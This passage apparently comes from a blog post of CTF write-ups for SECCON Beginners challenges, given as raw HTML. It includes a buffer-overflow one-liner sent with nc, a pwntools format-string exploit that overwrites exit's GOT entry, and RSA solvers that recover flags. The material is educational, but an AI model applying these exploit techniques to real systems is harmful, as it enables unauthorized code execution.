bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAAsTAAALEwEAmpwYAAABqElEQVQoz5WT6XKbQBCE9wYWFlhuhIwsxVblev/X67QFrrISJRX/6JqFYj6mZ2bF2KeYW4NTGXCZDmizFF1O+RQ9z85aCCH+X8r626GcClTLgrF38KOBzRTKpIRxyeeA2u4JPyREL9BUDt35BGEV4nRBezwjL7LPANPt8I3qBGKd4/B1hQ4WYX5BvbyiHI5QSsBKjSbJWXmO4DIo5qm/Ar9vwDLW6F9aKC3h5xPi/IQ01LdvjJQIdFQyxxuHjO+SfwIHgVCXqK8lRMLkwyvaaYRLtsFYY1F1K3w1wGpzq07vMnu8B7KHsSkwP59p0SCfVlSHK7Kqh2B1VrKv2qJUGoHPnnluV7rH+x4SGGi5+fIE5TSK+YLQH5EUDSQtWv6kTXPElBuReOR7ZY8t/9wsxzZwyhyCFKxuQXd8Rmi62zdqB7xF+cHuY+BK1YQEx53k2miHopnh48ihNDCsKuF0W1qO7F+k7erd5kPglWoFfN2gugxQViCbV1pe4IrIG6A5FO4owQMVafkN6P+4KeZ9sTfLNo9QrYXWXHLf86Y4SKXukuSHKH8D/gIlyAPsvajSegAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/9278bf02aa97f8a5d0fcf72b29200404/8ac56/image-20240616082132183.webp 240w,\n/static/9278bf02aa97f8a5d0fcf72b29200404/d3be9/image-20240616082132183.webp 480w,\n/static/9278bf02aa97f8a5d0fcf72b29200404/e46b2/image-20240616082132183.webp 960w,\n/static/9278bf02aa97f8a5d0fcf72b29200404/0d9bd/image-20240616082132183.webp 1246w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/9278bf02aa97f8a5d0fcf72b29200404/8ff5a/image-20240616082132183.png 240w,\n/static/9278bf02aa97f8a5d0fcf72b29200404/e85cb/image-20240616082132183.png 480w,\n/static/9278bf02aa97f8a5d0fcf72b29200404/d9199/image-20240616082132183.png 960w,\n/static/9278bf02aa97f8a5d0fcf72b29200404/9239a/image-20240616082132183.png 1246w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/9278bf02aa97f8a5d0fcf72b29200404/d9199/image-20240616082132183.png\"\n            alt=\"image-20240616082132183\"\n            title=\"image-20240616082132183\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Using the results above, I sent the payload created with the following command to obtain the flag.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">python3 -c <span class=\"token string\">'import sys; from pwn import *; sys.stdout.buffer.write(b\"A\"*0x12 + p64(0x401186))'</span>  <span class=\"token operator\">|</span> <span class=\"token function\">nc</span> simpleoverwrite.beginners.seccon.games <span class=\"token number\">9001</span></code></pre></div>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 862px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/b05f84c3f85a2c89264bf10ca19f2614/f0551/image-20240616082443122.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 12.5%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAmUlEQVQI15WKSQ6CMABFy2ApujEkipW2SGVQohDk/md7NngCFz/vT6JfNd2isf6Gf8ycjKcMct0Y8oRrR5pA44eNrn1ybQb8MNL3He/phXWWy6XEWIOotMHZmnmewuGO1iXWVnhfUxRH5C4lVxmZ3HHY56hMBp8iQ85zFShRSpEkCUIIhL839EPHZ104nc9bGcfxb/xTURTxBQfeSWPxgHj7AAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/b05f84c3f85a2c89264bf10ca19f2614/8ac56/image-20240616082443122.webp 240w,\n/static/b05f84c3f85a2c89264bf10ca19f2614/d3be9/image-20240616082443122.webp 480w,\n/static/b05f84c3f85a2c89264bf10ca19f2614/e32b8/image-20240616082443122.webp 862w\"\n              sizes=\"(max-width: 862px) 100vw, 862px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/b05f84c3f85a2c89264bf10ca19f2614/8ff5a/image-20240616082443122.png 240w,\n/static/b05f84c3f85a2c89264bf10ca19f2614/e85cb/image-20240616082443122.png 480w,\n/static/b05f84c3f85a2c89264bf10ca19f2614/f0551/image-20240616082443122.png 862w\"\n            sizes=\"(max-width: 862px) 100vw, 862px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/b05f84c3f85a2c89264bf10ca19f2614/f0551/image-20240616082443122.png\"\n            alt=\"image-20240616082443122\"\n            title=\"image-20240616082443122\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"pure-and-easypwn\" style=\"position:relative;\"><a href=\"#pure-and-easypwn\" aria-label=\"pure and easypwn permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>pure-and-easy(Pwn)</h2>\n<p>This was super-easy challenge #3.</p>\n<p>The following source code is provided for the challenge binary.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;stdio.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;stdlib.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;unistd.h></span></span>\n\n<span class=\"token keyword\">int</span> <span class=\"token function\">main</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n  <span class=\"token keyword\">char</span> buf<span class=\"token punctuation\">[</span><span class=\"token number\">0x100</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">{</span><span class=\"token number\">0</span><span class=\"token punctuation\">}</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"> \"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">read</span><span class=\"token punctuation\">(</span><span class=\"token number\">0</span><span class=\"token punctuation\">,</span> buf<span class=\"token punctuation\">,</span> <span class=\"token number\">0xff</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span>buf<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">exit</span><span class=\"token punctuation\">(</span><span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token keyword\">void</span> <span class=\"token function\">win</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n  <span class=\"token keyword\">char</span> buf<span class=\"token punctuation\">[</span><span class=\"token number\">0x50</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">;</span>\n  FILE <span class=\"token operator\">*</span>fp <span class=\"token operator\">=</span> <span class=\"token function\">fopen</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"./flag.txt\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"r\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">fgets</span><span class=\"token punctuation\">(</span>buf<span class=\"token punctuation\">,</span> <span class=\"token number\">0x50</span><span class=\"token punctuation\">,</span> fp<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">puts</span><span class=\"token punctuation\">(</span>buf<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token keyword\">__attribute__</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span>constructor<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token keyword\">void</span> <span class=\"token function\">init</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n  <span class=\"token function\">setvbuf</span><span class=\"token punctuation\">(</span><span class=\"token constant\">stdin</span><span class=\"token punctuation\">,</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">,</span> _IONBF<span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">setvbuf</span><span class=\"token punctuation\">(</span><span class=\"token constant\">stdout</span><span class=\"token punctuation\">,</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">,</span> _IONBF<span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">alarm</span><span class=\"token punctuation\">(</span><span class=\"token number\">120</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>At a glance, it’s clear there is a format string bug (FSB) vulnerability.</p>\n<p>Also, since PIE is disabled and it’s Partial RELRO, a GOT override should be straightforward.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 796px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/b1e8858808b04e5dd866e7284f6d16c2/d48f1/image-20240616082659690.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 17.916666666666668%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAsElEQVQY052M2W7CMBREb4Aqi50oLHFEdtsoCQHE/3/dqdUX1LeqD0czmhmN9I8S967o1xOm62jdRuPutHZhml/0t43O35mW4P3GdbgFfMhW5nVhHAeatsEYQ13XiLOOqjKcyiPb4pn9GHTETS1aK7TKflSplKLIybKUNE3Icx0yRZzEiMiH1/vJ+Xxh9yUM655q2HG1Qqyj38O/Yu2ERBHJQTBaqEuhycJ5KIt/HH4DtCpdjOcrltwAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/b1e8858808b04e5dd866e7284f6d16c2/8ac56/image-20240616082659690.webp 240w,\n/static/b1e8858808b04e5dd866e7284f6d16c2/d3be9/image-20240616082659690.webp 480w,\n/static/b1e8858808b04e5dd866e7284f6d16c2/7fcbc/image-20240616082659690.webp 796w\"\n              sizes=\"(max-width: 796px) 100vw, 796px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/b1e8858808b04e5dd866e7284f6d16c2/8ff5a/image-20240616082659690.png 240w,\n/static/b1e8858808b04e5dd866e7284f6d16c2/e85cb/image-20240616082659690.png 480w,\n/static/b1e8858808b04e5dd866e7284f6d16c2/d48f1/image-20240616082659690.png 796w\"\n            sizes=\"(max-width: 796px) 100vw, 796px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/b1e8858808b04e5dd866e7284f6d16c2/d48f1/image-20240616082659690.png\"\n            alt=\"image-20240616082659690\"\n            title=\"image-20240616082659690\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Therefore, I wrote the following solver to execute the win function via a GOT override of the conveniently placed exit function.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">from</span> pwn <span class=\"token keyword\">import</span> <span class=\"token operator\">*</span>\n\n<span class=\"token comment\"># Set context</span>\n<span class=\"token comment\"># context.log_level = \"debug\"</span>\ncontext<span class=\"token punctuation\">.</span>arch <span class=\"token operator\">=</span> <span class=\"token string\">\"amd64\"</span>\ncontext<span class=\"token punctuation\">.</span>endian <span class=\"token operator\">=</span> <span class=\"token string\">\"little\"</span>\ncontext<span class=\"token punctuation\">.</span>word_size <span class=\"token operator\">=</span> <span class=\"token number\">64</span>\n\n<span class=\"token comment\"># Set target</span>\ntarget <span class=\"token operator\">=</span> remote<span class=\"token punctuation\">(</span><span class=\"token string\">\"pure-and-easy.beginners.seccon.games\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">9000</span><span class=\"token punctuation\">)</span>\nTARGET_PATH <span class=\"token operator\">=</span> <span class=\"token string\">\"./chall\"</span>\nelf <span class=\"token operator\">=</span> ELF<span class=\"token punctuation\">(</span>TARGET_PATH<span class=\"token punctuation\">)</span>\ngot_exit <span class=\"token operator\">=</span> <span class=\"token number\">0x404040</span>\nwin <span class=\"token operator\">=</span> <span class=\"token number\">0x401341</span>\n\n<span class=\"token comment\"># Exploit</span>\ntarget<span class=\"token punctuation\">.</span>recvuntil<span class=\"token punctuation\">(</span><span class=\"token string\">b\"> \"</span><span class=\"token punctuation\">)</span>\npayload <span class=\"token operator\">=</span> fmtstr_payload<span class=\"token punctuation\">(</span>offset<span class=\"token operator\">=</span><span class=\"token number\">6</span><span class=\"token punctuation\">,</span> writes<span class=\"token operator\">=</span><span class=\"token punctuation\">{</span>got_exit<span class=\"token punctuation\">:</span>win<span class=\"token punctuation\">}</span><span class=\"token punctuation\">,</span>write_size<span class=\"token operator\">=</span><span class=\"token string\">\"short\"</span><span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>send<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\n\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span>target<span class=\"token punctuation\">.</span>recvuntil<span class=\"token punctuation\">(</span><span class=\"token string\">b\"}\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Finish exploit</span>\ntarget<span class=\"token punctuation\">.</span>clean<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>interactive<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span></code></pre></div>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/c9a2892b59799b6ec11b17b927dab9f0/712f7/image-20240616091036238.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 12.083333333333332%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAYAAABYBvyLAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAVUlEQVQI132MOw7AIAzFAhSIIIUqCPq5/z1fK5ZuDJYnm/ZSICIIIYCZETnCew8iWpJSQj0qsuSvz/Mxu+e+MM6B1hR99GlVncFqaK2F2xyc+zHG4AV0rSr5mV66VgAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/c9a2892b59799b6ec11b17b927dab9f0/8ac56/image-20240616091036238.webp 240w,\n/static/c9a2892b59799b6ec11b17b927dab9f0/d3be9/image-20240616091036238.webp 480w,\n/static/c9a2892b59799b6ec11b17b927dab9f0/e46b2/image-20240616091036238.webp 960w,\n/static/c9a2892b59799b6ec11b17b927dab9f0/a110d/image-20240616091036238.webp 1181w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/c9a2892b59799b6ec11b17b927dab9f0/8ff5a/image-20240616091036238.png 240w,\n/static/c9a2892b59799b6ec11b17b927dab9f0/e85cb/image-20240616091036238.png 480w,\n/static/c9a2892b59799b6ec11b17b927dab9f0/d9199/image-20240616091036238.png 960w,\n/static/c9a2892b59799b6ec11b17b927dab9f0/712f7/image-20240616091036238.png 1181w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/c9a2892b59799b6ec11b17b927dab9f0/d9199/image-20240616091036238.png\"\n            alt=\"image-20240616091036238\"\n            title=\"image-20240616091036238\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>By the way, I used fmtstr_payload here for convenience, but for more details on FSB and handcrafting payloads, please see the article below.</p>\n<p>Reference: <a href=\"/ctf-pwn-og\">A Beginner CTFer’s Super Introduction to Pwn - FSB Basics and ROP Techniques - Frog’s Secret Base</a></p>\n<h2 id=\"safe-primecrypto\" style=\"position:relative;\"><a href=\"#safe-primecrypto\" aria-label=\"safe primecrypto permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Safe Prime(Crypto)</h2>\n<blockquote>\n<p>Using a safe prime makes RSA secure, doesn’t it?</p>\n</blockquote>\n<p>I solved a Crypto challenge for the first time in a while.</p>\n<p>The following script along with n, e, and c are provided for the challenge.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">import</span> os\n<span class=\"token keyword\">from</span> Crypto<span class=\"token punctuation\">.</span>Util<span class=\"token punctuation\">.</span>number <span class=\"token keyword\">import</span> getPrime<span class=\"token punctuation\">,</span> isPrime\n\nFLAG <span class=\"token operator\">=</span> os<span class=\"token punctuation\">.</span>getenv<span class=\"token punctuation\">(</span><span class=\"token string\">\"FLAG\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"ctf4b{*** REDACTED ***}\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>encode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\nm <span class=\"token operator\">=</span> <span class=\"token builtin\">int</span><span class=\"token punctuation\">.</span>from_bytes<span class=\"token punctuation\">(</span>FLAG<span class=\"token punctuation\">,</span> <span class=\"token string\">'big'</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token keyword\">while</span> <span class=\"token boolean\">True</span><span class=\"token punctuation\">:</span>\n    p <span class=\"token operator\">=</span> getPrime<span class=\"token punctuation\">(</span><span class=\"token number\">512</span><span class=\"token punctuation\">)</span>\n    q <span class=\"token operator\">=</span> <span class=\"token number\">2</span> <span class=\"token operator\">*</span> p <span class=\"token operator\">+</span> <span class=\"token number\">1</span>\n    <span class=\"token keyword\">if</span> isPrime<span class=\"token punctuation\">(</span>q<span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n        <span class=\"token keyword\">break</span>\n\nn <span class=\"token operator\">=</span> p <span class=\"token operator\">*</span> q\ne <span class=\"token operator\">=</span> <span class=\"token number\">65537</span>\nc <span class=\"token operator\">=</span> <span class=\"token builtin\">pow</span><span class=\"token punctuation\">(</span>m<span class=\"token punctuation\">,</span> e<span class=\"token punctuation\">,</span> n<span class=\"token punctuation\">)</span>\n\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"</span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>n <span class=\"token operator\">=</span> <span class=\"token punctuation\">}</span></span><span class=\"token string\">\"</span></span><span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"</span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>c <span class=\"token operator\">=</span> <span class=\"token punctuation\">}</span></span><span class=\"token string\">\"</span></span><span class=\"token punctuation\">)</span></code></pre></div>\n<p>Since q is generated from p, n can be expressed as a quadratic equation in one variable p.</p>\n<p>Therefore, by using the following solver to solve the equation for p and q, I was able to decrypt the ciphertext and obtain the flag.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">from</span> sympy <span class=\"token keyword\">import</span> symbols<span class=\"token punctuation\">,</span> Eq<span class=\"token punctuation\">,</span> solve<span class=\"token punctuation\">,</span> mod_inverse\n<span class=\"token keyword\">from</span> Crypto<span class=\"token punctuation\">.</span>Util<span class=\"token punctuation\">.</span>number <span class=\"token keyword\">import</span> long_to_bytes\n\ne <span class=\"token operator\">=</span> <span class=\"token number\">65537</span>\np <span class=\"token operator\">=</span> symbols<span class=\"token punctuation\">(</span><span class=\"token string\">'p'</span><span class=\"token punctuation\">)</span>\nc <span class=\"token operator\">=</span> <span class=\"token number\">40791470236110804733312817275921324892019927976655404478966109115157033048751614414177683787333122984170869148886461684367352872341935843163852393126653174874958667177632653833127408726094823976937236033974500273341920433616691535827765625224845089258529412235827313525710616060854484132337663369013424587861</span>\nn <span class=\"token operator\">=</span> <span class=\"token number\">292927367433510948901751902057717800692038691293351366163009654796102787183601223853665784238601655926920628800436003079044921928983307813012149143680956641439800408783429996002829316421340550469318295239640149707659994033143360850517185860496309968947622345912323183329662031340775767654881876683235701491291</span>\nequation <span class=\"token operator\">=</span> Eq<span class=\"token punctuation\">(</span><span class=\"token number\">2</span><span class=\"token operator\">*</span>p<span class=\"token operator\">**</span><span class=\"token number\">2</span> <span class=\"token operator\">+</span> p<span class=\"token punctuation\">,</span> n<span class=\"token punctuation\">)</span>\nsolutions <span class=\"token operator\">=</span> solve<span class=\"token punctuation\">(</span>equation<span class=\"token punctuation\">,</span> p<span class=\"token punctuation\">)</span>\np <span class=\"token operator\">=</span> solutions<span class=\"token punctuation\">[</span><span class=\"token number\">1</span><span class=\"token punctuation\">]</span>\nq <span class=\"token operator\">=</span> q <span class=\"token operator\">=</span> <span class=\"token number\">2</span> <span class=\"token operator\">*</span> p <span class=\"token operator\">+</span> <span class=\"token number\">1</span>\n<span class=\"token keyword\">assert</span> <span class=\"token punctuation\">(</span>p <span class=\"token operator\">*</span> q<span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> n\n\nphi_n <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span>p <span class=\"token operator\">-</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">*</span> <span class=\"token punctuation\">(</span>q <span class=\"token operator\">-</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span>\nd <span class=\"token operator\">=</span> mod_inverse<span class=\"token punctuation\">(</span>e<span class=\"token punctuation\">,</span> phi_n<span class=\"token punctuation\">)</span>\nm <span class=\"token operator\">=</span> <span class=\"token builtin\">pow</span><span class=\"token punctuation\">(</span>c<span class=\"token punctuation\">,</span> d<span class=\"token punctuation\">,</span> n<span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span>long_to_bytes<span class=\"token punctuation\">(</span>m<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n<span class=\"token comment\"># ctf4b{R3l4ted_pr1m3s_4re_vuLner4ble_n0_maTt3r_h0W_l4rGe_p_1s}</span></code></pre></div>\n<h2 id=\"mathcrypto\" style=\"position:relative;\"><a href=\"#mathcrypto\" aria-label=\"mathcrypto permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>math(Crypto)</h2>\n<blockquote>\n<p>It seems there are special conditions on the variables used in the RSA encryption…?</p>\n</blockquote>\n<p>The following code along with n, e, c, and ab are provided for the challenge.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">from</span> Crypto<span class=\"token punctuation\">.</span>Util<span class=\"token punctuation\">.</span>number <span class=\"token keyword\">import</span> bytes_to_long<span class=\"token punctuation\">,</span> isPrime\n<span class=\"token keyword\">from</span> secret <span class=\"token keyword\">import</span> <span class=\"token punctuation\">(</span>\n    x<span class=\"token punctuation\">,</span>\n    p<span class=\"token punctuation\">,</span>\n    q<span class=\"token punctuation\">,</span>\n<span class=\"token punctuation\">)</span>  <span class=\"token comment\"># x, p, q are secret values, please derive them from the provided other values.</span>\n<span class=\"token keyword\">import</span> gmpy2\n\n\n<span class=\"token keyword\">def</span> <span class=\"token function\">is_square</span><span class=\"token punctuation\">(</span>n<span class=\"token punctuation\">:</span> <span class=\"token builtin\">int</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">:</span>\n    <span class=\"token keyword\">return</span> gmpy2<span class=\"token punctuation\">.</span>isqrt<span class=\"token punctuation\">(</span>n<span class=\"token punctuation\">)</span> <span class=\"token operator\">**</span> <span class=\"token number\">2</span> <span class=\"token operator\">==</span> n\n\n\n<span class=\"token keyword\">assert</span> isPrime<span class=\"token punctuation\">(</span>p<span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">assert</span> isPrime<span class=\"token punctuation\">(</span>q<span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">assert</span> p <span class=\"token operator\">!=</span> q\n\na <span class=\"token operator\">=</span> p <span class=\"token operator\">-</span> x\nb <span class=\"token operator\">=</span> q <span class=\"token operator\">-</span> x\n<span class=\"token keyword\">assert</span> is_square<span class=\"token punctuation\">(</span>x<span class=\"token punctuation\">)</span> <span class=\"token keyword\">and</span> is_square<span class=\"token punctuation\">(</span>a<span class=\"token punctuation\">)</span> <span class=\"token keyword\">and</span> is_square<span class=\"token punctuation\">(</span>b<span class=\"token punctuation\">)</span>\n\nn <span class=\"token operator\">=</span> p <span class=\"token operator\">*</span> q\ne <span class=\"token operator\">=</span> <span class=\"token number\">65537</span>\nflag <span class=\"token operator\">=</span> <span class=\"token string\">b\"ctf4b{dummy_f14g}\"</span>\nmes <span class=\"token operator\">=</span> bytes_to_long<span class=\"token punctuation\">(</span>flag<span class=\"token punctuation\">)</span>\nc <span class=\"token operator\">=</span> <span class=\"token builtin\">pow</span><span class=\"token punctuation\">(</span>mes<span class=\"token punctuation\">,</span> e<span class=\"token punctuation\">,</span> n<span class=\"token punctuation\">)</span>\n\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"n = </span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>n<span class=\"token punctuation\">}</span></span><span class=\"token string\">\"</span></span><span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"e = </span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>e<span class=\"token punctuation\">}</span></span><span class=\"token string\">\"</span></span><span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token 